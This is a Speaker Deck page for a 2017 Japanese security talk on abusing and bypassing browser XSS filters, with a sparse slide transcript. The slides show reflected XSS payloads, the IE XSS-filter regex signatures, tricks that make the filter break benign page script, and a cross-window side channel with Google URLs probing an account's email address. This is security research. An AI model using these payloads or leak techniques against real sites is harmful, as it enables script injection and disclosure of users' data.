Upgrade to Pro — share decks privately, control downloads, hide ads and more …

XSSフィルターの使い方/ Shibuya.XSS techtalk #9

Sponsored · SiteGround - Reliable hosting with speed, security, and support you can count on.
Avatar for Masato Kinugawa Masato Kinugawa
March 31, 2017
Technology
3.4k
7

XSSフィルターの使い方/ Shibuya.XSS techtalk #9

2017/3/30 に行われた Shibuya.XSS techtalk #9 の発表資料です。

Avatar for Masato Kinugawa

Masato Kinugawa

March 31, 2017

More Decks by Masato Kinugawa

See All by Masato Kinugawa
Shadow DOMとセキュリティ - 光と影の境界を探る / Shibuya.XSS techtalk #13
Avatar for Masato Kinugawa masatokinugawa
0
810
Shadow DOM & Security - Exploring the boundary between light and shadow
Avatar for Masato Kinugawa masatokinugawa
1
2.1k
ブラウザのレガシー・独自機能を愛でる-Firefoxの脆弱性4選- / Browser Crash Club #1
Avatar for Masato Kinugawa masatokinugawa
1
1.1k
注目したいクライアントサイドの脆弱性2選/ Security.Tokyo #3
Avatar for Masato Kinugawa masatokinugawa
8
4.3k
バグハンティングのすゝめ / P3NFEST
Avatar for Masato Kinugawa masatokinugawa
5
2.7k
Pwn2OwnでMicrosoft Teamsをハッキングして2000万円を獲得した方法/ Shibuya.XSS techtalk #12
Avatar for Masato Kinugawa masatokinugawa
13
21k
How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
Avatar for Masato Kinugawa masatokinugawa
1
24k
JSでDoSる/ Shibuya.XSS techtalk #11
Avatar for Masato Kinugawa masatokinugawa
20
7.2k
Electron: Abusing the lack of context isolation - CureCon(en)
Avatar for Masato Kinugawa masatokinugawa
5
110k

Other Decks in Technology

See All in Technology
古今東西SRE
Avatar for Kaoru okaru
2
180
20260513_生成AIを専属DSに_AI分析結果の検品テクニック_ハンズオン_交通事故データ
Avatar for NobuakiOshiro doradora09
PRO
0
220
Forget technical debt
Avatar for Uwe Friedrichsen ufried
0
190
Agent Skillsで実現する記憶領域の運用とその後
Avatar for yamadashy / やまだし yamadashy
2
1.8k
雑談は、センサーだった
Avatar for 株式会社ビットキー / Bitkey Inc. bitkey
PRO
2
230
いつの間にかデータエンジニア以外の業務も増えていたけど、意外と経験が役に立ってる
Avatar for ZOZO Developers zozotech
PRO
0
480
Purview 勉強会報告 Microsoft Purview 入門しようとしてみた
Avatar for masakichi masakichixo
1
360
Shiny New Tools Won't Fix Your Problem
Avatar for Trisha Gee trishagee
1
120
【関西製造業祭り2026春】現場を変える技術はここまで来た〜世界最大の製造業見本市から持って帰ってきたもの〜
Avatar for 田中 聖也 tanakaseiya
0
130
AI時代の品質はテストプロセスの作り直し #scrumniigata
Avatar for kyonmm kyonmm
PRO
4
1.5k
会社説明資料|株式会社ギークプラス ソフトウェア事業部
Avatar for ギークプラス ソフトウェア事業部 geekplus_tech
0
220
多角的な視点から見たAGI
Avatar for Terisuke terisuke
0
130

Featured

See All Featured
What's in a price? How to price your products and services
Avatar for Michael Herold michaelherold
247
13k
Heart Work Chapter 1 - Part 1
Avatar for Lake Fama lfama
PRO
6
35k
10 Git Anti Patterns You Should be Aware of
Avatar for Lemi Orhan Ergin lemiorhan
PRO
659
62k
How to train your dragon (web standard)
Avatar for Monica Dinculescu notwaldorf
97
6.6k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
Avatar for Marc Duiker marcduiker
35
2.4k
Navigating Team Friction
Avatar for Lara Hogan lara
192
16k
Between Models and Reality
Avatar for mayunak mayunak
3
280
Kristin Tynski - Automating Marketing Tasks With AI
Avatar for Tech SEO Connect techseoconnect
PRO
0
240
How to build a perfect <img>
Avatar for Jono Alderson jonoalderson
1
5.5k
Principles of Awesome APIs and How to Build Them.
Avatar for Keavy McMinn keavy
128
17k
Google's AI Overviews - The New Search
Avatar for Barry Adams badams
0
1k
Save Time (by Creating Custom Rails Generators)
Avatar for Garrett Dimon garrettdimon
PRO
32
3k

Transcript

  1. None
  2. None

  3. ❶ ➌ ❷ ❹

  4. None

  5. https://example.com/?q="><svg+onload=alert(1)> <html> <body> <input value=""><svg onload=alert(1)>"> </body> </html>

  6. https://example.com/?q="><svg+onload=alert(1)> <html> <body> <input value=""><svg #nload=alert#1#>"> </body> </html>

  7. https://addons.mozilla.org/ja/firefox/addon/noscript/

  8. HTTP/1.1 200 OK Date: Tue, 28 Mar 2017 06:16:00 GMT

    Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN
  9. None
  10. None
  11. None

  12. https://example.com/?q="><svg+onload=alert(1)> https://example.com/#5382863726995448701 <input value=""><svg #nload=alert#1#>"> <input value=""><svg onload=alert(1)>">

  13. None

  14. <input value=""><svg #nload=alert#1#>"> <input value="<svg #nload=alert#1#>"> <!-- <svg #nload=alert(1)> -->

    https://example.com/?q="><svg+onload=alert(1)>

  15. <input value=""><svg onload=alert(1)>"> <input value="<svg onload=alert(1)>"> <!-- <aaa onload=alert(1)> -->

    https://example.com/?q="><svg+onload=alert(1)>

  16. https://example.com/?q="><svg+onload=alert(1)> https://example.com/#5382863726995448701

  17. <title>&lt;script&gt; - Google 検索</title> <script>(function(){window.google={kEI: [...] https://www.google.co.jp/search?q=<script>

  18. <script src=//example.jp/jquery.js></script> <script> if(jQuery){ // Expected }else{ // ??? }

    </script> https://example.com/?<script src=//example.jp/jquery.js></script>
  19. None

  20. {<a.*?hr{e}f} {[\"\'][ ]*(([^a-z0-9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])))).+?{\(}.*?{\)}} [...] {(v|(&#x?0*((86)|(56)|(118)|(76));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*{(b|(&#x?0 *((66)|(42)|(98)|(62));?))}([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(s|(&#x?0*((83)|(53) |(115)|(73));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*((c|(&#x?0*((67)|(43)|(99)|(63) );?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(r|(&#x?0*((82)|(52)|(114)|(72));?))([\t]| (&((#x?0*(9|(13)|(10)|A|D);?)|(tab;)|(newline;))))*(i|(&#x?0*((73)|(49)|(105)|(69));?))([\t]|(&((#x?0*(9

    |(13)|(10)|A|D);?)|(tab;)|(newline;))))*(p|(&#x?0*((80)|(50)|(112)|(70));?))([\t]|(&((#x?0*(9|(13)|(10)| A|D);?)|(tab;)|(newline;))))*(t|(&#x?0*((84)|(54)|(116)|(74));?))([\t]|(&((#x?0*(9|(13)|(10)|A|D);?)|(ta b;)|(newline;))))*)?(:|(&((#x?0*((58)|(3A));?)|(colon;)))).} {<BUTTON[ /+\t].*?va{l}ue[ /+\t]*=} {<fo{r}m.*?>} {<OPTION[ /+\t].*?va{l}ue[ /+\t]*=} {<INPUT[ /+\t].*?va{l}ue[ /+\t]*=} [...] {<EM{B}ED[ /+\t].*?((src)|(type)).*?=} {[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.} {<ME{T}A[ /+\t].*?((http-equiv)|(charset))[ /+\t]*=} [...] "><svg #nload=alert#1#>

  21. [ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=. "><svg[SPACE]onload=alert(1)>

  22. "><svg onload=alert(1)> [\"\'][ ]*(([^a-z0- 9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee])) )).+?{\(}.*?{\)} x="";alert(1)//"

  23. None

  24. https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU- 2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf http://d.hatena.ne.jp/teracc/20090622

  25. https://www.slideshare.net/masatokinugawa/xxn-ja

  26. [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)) .+?[.].+?= <script> q = "";document#body.innerHTML="<xss>"; </script> URL:

    ?q=";document.body.innerHTML="<xss>

  27. [\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in)) .+?[.].+?= <script src> <script src="//example.co.jp/test.js" type="text/javascript"> </script>

    URL: ?"/++.+++=

  28. "style=:\ javascript:- vbscript:- vbs:- ",x[]= "{toString: "{valueOf:

  29. <script src="//example^co.jp/test.js" type="text/javascript"> </script>

  30. window#name//Syntax Error window^name//Syntax OK <script> window.name

  31. None

  32. url=location.search.slice(1); if(url^indexOf(":")!=-1){ url=null; } onload=function(){ if(url){location=url;} }

  33. https://example.com/?q=";alert`1`// <script> q = "";alert`1`//"; </script> https://www.slideshare.net/x00mario/es6-en/34 ECMAScript 6 from

    an Attacker's Perspective - Breaking Frameworks, Sandboxes, and everything else

  34. https://example.com/?q=${alert(1)}``//&`+++` https://example.com/?q=[USER_INPUT] <script> foo=``; q="[USER_INPUT]"; </script> <script> foo=`#; q="${alert(1)}#`//"; </script>

  35. https://example.com/?+onfiles+++=. <script src="/comm#nfiles/js/important.js" type="text/javascript"> </script> [...]

  36. https://bugs.chromium.org/p/chromium/issues/detail?id=654794

  37. None

  38. http://blog.portswigger.net/2015/08/abusing-chromes-xss-auditor-to-steal.html

  39. https://VICTIM/ https://VICTIM/?<xss> IFRAME ERROR https://ATTACKER/ win=window.open(…) if(win.length == 0){ //

    // }else{ // } <script>…</script>

  40.     

  41. https://www.youtube.com/watch?v=IMDWjKFbsJE

  42. HTTP/1.1 200 OK [...] Server: gws X-XSS-Protection: 1; mode=block X-Frame-Options:

    SAMEORIGIN

  43. https://accounts.google.com/ServiceLogin?

  44. google.ae google.as google.ca google.co google.co.in google.co.jp google.co.kr google.co.nz google.co.uk google.com.br

    google.com.mx google.de google.es google.fr google.it google.pl google.pt google.ru ...(

  45. ✨ ✨ ✨

  46. {<a.*?hr{e}f}

  47. 0 <ahref> 1 <aAhref> 2 <aAAhref> 3 <aAAAhref> 4 <aAAAAhref>

    5 <aAAAAAhref> 6 <aAAAAAAhref> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> https://example.com/

  48. 0 <ahref> 1 <aAhref> 2 <aAAhref> 3 <aAAAhref> 4 <aAAAAhref>

    5 <aAAAAAhref> 6 <aAAAAAAhref> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> <a%XXhref https://example.com/?<a%2Bhref

  49. 0 <ahr#f> 1 <aAhr#f> 2 <aAAhr#f> 3 <aAAAhr#f> 4 <aAAAAhr#f>

    5 <aAAAAAhr#f> 6 <aAAAAAAhr#f> 7 <aAAAAAAAhref> 8 <aAAAAAAAAhref> 9 <aAAAAAAAAAhref> 10<aAAAAAAAAAAhref> https://example.com/?<a%2Bhref

  50. 0x01-08 0x0E-1F !"$%'()*;=^`|~ 0x09-0D 0x20 + & > #,/:?[\]{} -.@_

    A a 0x00 0-9 < B-Z b-z

  51. 0x01-08 0x0E-1F !"$%'()*;=^`|~ 0x09-0D 0x20 + & > #,/:?[\]{} -.@_

    A a 0x00 0-9 < B-Z b-z

  52. <div class="gb_xb">[email protected]</div><div class="gb_pb"> {[\"\'`][ ]*(([^a-z0-9~_:\'\"` ])|(in)).+?{[.]}.+?=}

  53. ✔ ✔ ✔ ✔

  54. <div class="gb_xb">[email protected]</div><div class="gb_pb">

  55. https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]= https://www.google.co.jp/?"[email protected]=

  56. https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.de/?"[email protected]= https://www.google.ru/?"[email protected]=

    https://www.google.ru/?"[email protected]=

  57. https://www.google.ru/?"[email protected]= https://www.google.ru/?"[email protected]= https://www.google.ru/?"[email protected]= https://www.google.ru/?"[email protected]= https://www.google.ru/?"[email protected]= https://www.google.ru/?"[email protected]= https://www.google.ru/?"[email protected]= https://www.google.ca/?"[email protected]= ...

  58. ✨ ✨ ✨

  59. None
  60. None
  61. None
  62. None

  63.   

  64.     

  65.      

  66. None